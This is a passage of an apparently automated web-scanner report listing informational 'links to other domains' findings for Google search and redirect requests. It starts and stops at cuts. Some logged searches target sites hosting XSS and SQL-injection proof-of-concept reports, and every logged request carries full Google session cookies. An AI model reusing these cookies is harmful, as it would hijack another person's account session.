<h3 class="r"><a href="http://www.hlhz.com/us/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CE4QFjAH')">Home | <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:PViTVjDUEx4J:www.hlhz.com/us/+Houlihan+Lokey&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CFAQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Houlihan_Lokey_Howard_%26_Zukin" class=l onmousedown="return clk(this,'http://en.wikipedia.org/wiki/Houlihan_Lokey_Howard_%26_Zukin','','','','9','','0CFQQFjAI')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:54gofEF8cR0J:en.wikipedia.org/wiki/Houlihan_Lokey_Howard_%2526_Zukin+Houlihan+Lokey&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:54gofEF8cR0J:en.wikipedia.org/wiki/Houlihan_Lokey_Howard_%2526_Zukin+Houlihan+Lokey&cd=9&hl=en&ct=clnk&gl=us','','','','9','','0CFYQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vault.com/wps/portal/usa/companies/company-profile/Houlihan-Lokey?companyId=16944" class=l onmousedown="return clk(this,this.href,'','','','10','','0CFsQFjAJ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:w3JNFDUNvkMJ:www.vault.com/wps/portal/usa/companies/company-profile/Houlihan-Lokey%3FcompanyId%3D16944+Houlihan+Lokey&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:w3JNFDUNvkMJ:www.vault.com/wps/portal/usa/companies/company-profile/Houlihan-Lokey%3FcompanyId%3D16944+Houlihan+Lokey&cd=10&hl=en&ct=clnk&gl=us','','','','10','','0CF0QIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps" class=l onmousedown="return clk(this,this.href,'','','','11','','0CGIQFjAK')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:IfqaLECTPHoJ:www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps+Houlihan+Lokey&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','11','','0CG8QIDAK')">Cached</a>
...[SNIP]...
<div class="fc"><a href="http://www.wallstreetoasis.com/forums/houlihan-lokey-fas-rep" onmousedown="return clk(this,this.href,'','','','11','','0CGUQrAIoADAK')"><em>
...[SNIP]...
<br><a href="http://www.wallstreetoasis.com/forums/houlihan-lokey-associate-interview-what-to-expect" onmousedown="return clk(this,this.href,'','','','11','','0CGYQrAIoATAK')"><em>
...[SNIP]...
<br><a href="http://www.wallstreetoasis.com/tag/houlihan-lokey" onmousedown="return clk(this,this.href,'','','','11','','0CGcQrAIoAjAK')"><em>
...[SNIP]...
<br><a href="http://www.wallstreetoasis.com/forums/houlihan-lokey-reputation" onmousedown="return clk(this,this.href,'','','','11','','0CGgQrAIoAzAK')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/houlihan-lokey" class=l onmousedown="return clk(this,this.href,'','','','12','','0CHQQFjAL')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:rhhBdS0_5uUJ:www.linkedin.com/company/houlihan-lokey+Houlihan+Lokey&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','12','','0CHYQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://houlihanlokeysanchezracing.com/" class=l onmousedown="return clk(this,this.href,'','','','13','','0CHwQFjAM')">Sanchez / <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:3wJdTFCj2gcJ:houlihanlokeysanchezracing.com/+Houlihan+Lokey&amp;cd=13&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','13','','0CH4QIDAM')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://tbe.taleo.net/NA4/ats/careers/jobSearch.jsp?org=HLHZ&amp;cws=1" class=l onmousedown="return clk(this,this.href,'','','','14','','0CIMBEBYwDQ')">Campus Recruiting | <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:j_qMwCxxC70J:tbe.taleo.net/NA4/ats/careers/jobSearch.jsp%3Forg%3DHLHZ%26cws%3D1+Houlihan+Lokey&amp;cd=14&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:j_qMwCxxC70J:tbe.taleo.net/NA4/ats/careers/jobSearch.jsp%3Forg%3DHLHZ%26cws%3D1+Houlihan+Lokey&cd=14&hl=en&ct=clnk&gl=us','','','','14','','0CIUBECAwDQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://articles.latimes.com/2011/apr/28/business/la-fi-century-city-lease-20110428" class=l onmousedown="return clk(this,this.href,'','','','15','','0CIoBEBYwDg')">Century City, <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:sYV4d50aEvUJ:articles.latimes.com/2011/apr/28/business/la-fi-century-city-lease-20110428+Houlihan+Lokey&amp;cd=15&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','15','','0CIwBECAwDg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bestpromotionsinc.com/hlhz/" class=l onmousedown="return clk(this,this.href,'','','','16','','0CJABEBYwDw')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:64Lyai1hqX8J:www.bestpromotionsinc.com/hlhz/+Houlihan+Lokey&amp;cd=16&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','16','','0CJIBECAwDw')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj" class=l onmousedown="return clk(this,this.href,'','','','17','','0CJcBEKkCMBA')"><em>
...[SNIP]...
<div><a href="http://www.duffandphelps.com/" class=l onmousedown="return clk(this,this.href,'','','','18','','0CJ8BEKIIMBE')">Duff & Phelps</a>
...[SNIP]...
<div><a href="http://www.kbw.com/" class=l onmousedown="return clk(this,this.href,'','','','19','','0CKEBEKIIMBI')">Keefe, Bruyette & Woods, Inc.</a>
...[SNIP]...
<div><a href="http://www.jpmorganchase.com/" class=l onmousedown="return clk(this,this.href,'','','','20','','0CKMBEKIIMBM')">JPMorgan Chase</a>
...[SNIP]...
<div><a href="http://www.ghf.net/" class=l onmousedown="return clk(this,this.href,'','','','21','','0CKUBEKIIMBQ')">Greene Holcomb & Fisher LLC</a>
...[SNIP]...

17.88. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=site%3Axss.cx+usa.kapersky.com HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:14:47 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76490

<!doctype html><head><title>site:xss.cx usa.kapersky.com - Google Search</title><script>window.google={kEI:"lzBkTtb0HsjniAL736iVCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=site:xss.cx+usa.kapersky.com&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://xss.cx/examples/html/usa.kapersky.com.12-18-2010.html" class=l><em>
...[SNIP]...
<h3 class="r"><a href="http://xss.cx/examples/html/4.16.2011-xss-cross-site-scripting-dork-poc-example-report-vulnerable-server.html" class=l>XSS, DORK, Cross Site Scripting, CWE-89, CAPEC-86, Report for <b>
...[SNIP]...
<h3 class="r"><a href="http://xss.cx/xss-sql-injection-poc-reports.html" class=l>XSS, SQL Injection, HTTP Header Injection, DORK Master Index</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:UjEoBdBB6mcJ:xss.cx/xss-sql-injection-poc-reports.html+site:xss.cx+usa.kapersky.com&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://xss.cx/examples/html/" class=l>xss.cx - /examples/html/</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jjZXvY_Vlt4J:xss.cx/examples/html/+site:xss.cx+usa.kapersky.com&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://xss.cx/examples/dork/favicon.ico/4.2.2011.favicon.ico.dork.report.html" class=l>XSS, SQL Injection, HTTP Header Injection, DORK Report for April 2 <b>
...[SNIP]...
<h3 class="r"><a href="http://xss.cx/examples/xml/xss-dork-utm-cross-site-scripting-webrootcom.xml" class=l>Compare Internet Security Software, Compare Antivirus Software <b>
...[SNIP]...
<h3 class="r"><a href="http://xss.cx/2011/04/23/dork/local-file-inclusion-reflected-xss-dork-ghdb-www.nextadvisor.com_80.htm" class=l>local-file-inclusion-reflected-xss-dork-ghdb-www - Hoyt LLC</a>
...[SNIP]...

17.89. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sclient=psy&hl=en&source=hp&q=site:cloudscan.me&pbx=1&oq=site:cloudscan.me&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4813662l4818974l0l4819053l37l20l1l0l0l6l1303l5461l2.8.7.7-2l19l0&bav=on.2,or.r_gc.r_pw.&biw=1049&bih=910&cad=h HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=site%3Axss.cx+usa.kapersky.com
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:14:48 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76635

<!doctype html><head><title>site:cloudscan.me - Google Search</title><script>window.google={kEI:"mDBkTvCaDZHXiAKJrdytCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?hl=en&q=site:cloudscan.me&gs_sm=e&gs_upl=4813662l4818974l0l4819053l37l20l1l0l0l6l1303l5461l2.8.7.7-2l19l0&bav=on.2,or.r_gc.r_pw.&biw=1049&bih=910&um=1&ie=UTF-8&sa=N&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/" class=l>HTTPi, SQLi, XSS.CX</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:3_vCirVFaSoJ:www.cloudscan.me/+site:cloudscan.me&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/cloudscandetails.aspx" class=l>Scan Product Description | CloudScan</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:iwoJfCrQ39EJ:www.cloudscan.me/cloudscandetails.aspx+site:cloudscan.me&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/02/mtwittercom-cross-site-scripting.html" class=l>XSS, SQLi, HTTPi Research: m.twitter.com, Cross Site Scripting <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Q1sWNzaX8owJ:www.cloudscan.me/2011/02/mtwittercom-cross-site-scripting.html+site:cloudscan.me&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/06/read-writeappspotcom-xss-dork-ghdb.html" class=l>XSS, SQLi, HTTPi Research: read-write.appspot.com, XSS, DORK, GHDB <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:OnlEkq8cgSIJ:www.cloudscan.me/2011/06/read-writeappspotcom-xss-dork-ghdb.html+site:cloudscan.me&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/02/mittelstandsblogde-xss-capec-86-cross.html" class=l>XSS, SQLi, HTTPi Research: mittelstandsblog.de, XSS, CAPEC-86 <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:C_dblzd7Hu4J:www.cloudscan.me/2011/02/mittelstandsblogde-xss-capec-86-cross.html+site:cloudscan.me&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/02/rt83infolinkscom-xss-capec-86-cross.html" class=l>XSS, SQLi, HTTPi Research: rt83.infolinks.com, XSS, CAPEC-86 <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AJwbG5zU8McJ:www.cloudscan.me/2011/02/rt83infolinkscom-xss-capec-86-cross.html+site:cloudscan.me&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/01/cmsinternet-capec-86-cross-site.html" class=l>XSS, SQLi, HTTPi Research: cmsinter.net, CAPEC-86, Cross Site <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:G6OsQVxzru0J:www.cloudscan.me/2011/01/cmsinternet-capec-86-cross-site.html+site:cloudscan.me&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/06/thesoutherncom-xss-dork-ghdb-cross-site.html" class=l>XSS, SQLi, HTTPi Research: thesouthern.com, XSS, DORK, GHDB, Cross <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:YBGSoh731U4J:www.cloudscan.me/2011/06/thesoutherncom-xss-dork-ghdb-cross-site.html+site:cloudscan.me&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/02/bizfindus-xss-capec-86-cross-site.html" class=l>XSS, SQLi, HTTPi Research: bizfind.us, XSS, CAPEC-86, Cross Site <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:RMDbj7IHTCcJ:www.cloudscan.me/2011/02/bizfindus-xss-capec-86-cross-site.html+site:cloudscan.me&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/03/bphotobucketcom-xss-capec-86-cross-site.html" class=l>XSS, SQLi, HTTPi Research: b.photobucket.com, XSS, CAPEC-86, Cross <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:WJo2NWg8KQMJ:www.cloudscan.me/2011/03/bphotobucketcom-xss-capec-86-cross-site.html+site:cloudscan.me&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...

17.90. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sclient=psy&hl=en&source=hp&q=site:cloudscan.me&pbx=1&oq=site:cloudscan.me&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4813662l4818974l0l4819053l37l20l1l0l0l6l1303l5461l2.8.7.7-2l19l0&biw=1049&bih=910&bav=on.2,or.r_gc.r_pw.&cad=b&cad=h HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=site%3Axss.cx+usa.kapersky.com
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:20:39 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76651

<!doctype html><head><title>site:cloudscan.me - Google Search</title><script>window.google={kEI:"9zFkTp7VO_PZiALb6ZCdCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?hl=en&q=site:cloudscan.me&gs_sm=e&gs_upl=4813662l4818974l0l4819053l37l20l1l0l0l6l1303l5461l2.8.7.7-2l19l0&biw=1049&bih=910&bav=on.2,or.r_gc.r_pw.&um=1&ie=UTF-8&sa=N&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/" class=l>HTTPi, SQLi, XSS.CX</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:3_vCirVFaSoJ:www.cloudscan.me/+site:cloudscan.me&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/cloudscandetails.aspx" class=l>Scan Product Description | CloudScan</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:iwoJfCrQ39EJ:www.cloudscan.me/cloudscandetails.aspx+site:cloudscan.me&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/02/mtwittercom-cross-site-scripting.html" class=l>XSS, SQLi, HTTPi Research: m.twitter.com, Cross Site Scripting <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Q1sWNzaX8owJ:www.cloudscan.me/2011/02/mtwittercom-cross-site-scripting.html+site:cloudscan.me&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/06/read-writeappspotcom-xss-dork-ghdb.html" class=l>XSS, SQLi, HTTPi Research: read-write.appspot.com, XSS, DORK, GHDB <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:OnlEkq8cgSIJ:www.cloudscan.me/2011/06/read-writeappspotcom-xss-dork-ghdb.html+site:cloudscan.me&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/02/mittelstandsblogde-xss-capec-86-cross.html" class=l>XSS, SQLi, HTTPi Research: mittelstandsblog.de, XSS, CAPEC-86 <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:C_dblzd7Hu4J:www.cloudscan.me/2011/02/mittelstandsblogde-xss-capec-86-cross.html+site:cloudscan.me&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/02/rt83infolinkscom-xss-capec-86-cross.html" class=l>XSS, SQLi, HTTPi Research: rt83.infolinks.com, XSS, CAPEC-86 <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AJwbG5zU8McJ:www.cloudscan.me/2011/02/rt83infolinkscom-xss-capec-86-cross.html+site:cloudscan.me&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/01/cmsinternet-capec-86-cross-site.html" class=l>XSS, SQLi, HTTPi Research: cmsinter.net, CAPEC-86, Cross Site <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:G6OsQVxzru0J:www.cloudscan.me/2011/01/cmsinternet-capec-86-cross-site.html+site:cloudscan.me&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/06/thesoutherncom-xss-dork-ghdb-cross-site.html" class=l>XSS, SQLi, HTTPi Research: thesouthern.com, XSS, DORK, GHDB, Cross <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:YBGSoh731U4J:www.cloudscan.me/2011/06/thesoutherncom-xss-dork-ghdb-cross-site.html+site:cloudscan.me&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/02/bizfindus-xss-capec-86-cross-site.html" class=l>XSS, SQLi, HTTPi Research: bizfind.us, XSS, CAPEC-86, Cross Site <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:RMDbj7IHTCcJ:www.cloudscan.me/2011/02/bizfindus-xss-capec-86-cross-site.html+site:cloudscan.me&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cloudscan.me/2011/03/bphotobucketcom-xss-capec-86-cross-site.html" class=l>XSS, SQLi, HTTPi Research: b.photobucket.com, XSS, CAPEC-86, Cross <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:WJo2NWg8KQMJ:www.cloudscan.me/2011/03/bphotobucketcom-xss-capec-86-cross-site.html+site:cloudscan.me&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us">Cached</a>
...[SNIP]...

17.91. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=1&ved=0CBkQFjAA&url=http%3A%2F%2Fwww.w3.org%2FTR%2Fhtml5%2Fdom.html&ei=dzJkTvK1A4LhiAKKpfnJCg&usg=AFQjCNFZK1DFnfubU_VF3S3zUexd2mkNpg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Referrer+data+found+in+displayed+innerHTML#sclient=psy&hl=en&source=hp&q=Referrer+data+displayed+innerHTML&pbx=1&oq=Referrer+data+displayed+innerHTML&aq=f&aqi=&aql=&gs_sm=e&gs_upl=9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=ZPQD8fuJMOQI5s4Z9MfONwnbMd2RzPYqiZKsCDxwOlpRAuoJNxNrx5G8IFwTFkMcGwhz5SlrFLrYwMzlQCn8GDSpExBWP4wS1GsGI7TQPzoIcdgA9tAjsA_fx6b6-boa

Response

HTTP/1.1 302 Found
Location: http://www.w3.org/TR/html5/dom.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 02:22:59 GMT
Server: gws
Content-Length: 232
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.w3.org/TR/html5/dom.html">here</A>
...[SNIP]...

17.92. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

